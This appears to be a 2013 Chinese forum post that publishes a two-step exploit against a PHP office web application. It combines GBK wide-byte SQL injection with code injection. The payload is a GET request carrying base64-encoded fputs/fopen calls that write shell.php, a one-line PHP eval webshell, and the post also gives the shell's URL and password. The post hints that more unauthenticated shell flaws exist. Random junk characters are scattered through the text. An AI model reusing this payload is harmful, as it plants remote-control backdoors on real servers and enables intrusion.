此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.; @1 h, T6 Y; ~+ H
- {- K) t9 E O; L i
5 K1 O+ L& A, ~) A" [2 c
EXP:& i0 v# y3 ` p
, [$ d5 p9 P0 W% b( `第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
( f2 P* n: K& X6 R
4 G* b+ w( M5 v9 N第二步: [GET]http://site/general/email/index.php1 ]- _7 B: ~( \$ Z- D. m. ~% p
* A% v6 B; L" s: `/ nSHELL: http://site/general/email/shell.php 密码C
6 [& |8 C8 Z' j6 z ! S( V8 Y Z$ k* Z
/ X8 m/ u8 p' l; V* k/ S: q& y' y) h此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
" O) I* s2 K& n + j5 e1 V+ ` y1 m8 u
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~6 _+ f% a" v; f0 u! e
2 F5 W! Z' N3 J/ |
; H' Q0 _, Q' _* l/ ^ |
发表于 2013-2-4 16:19:29
收藏
支持
反对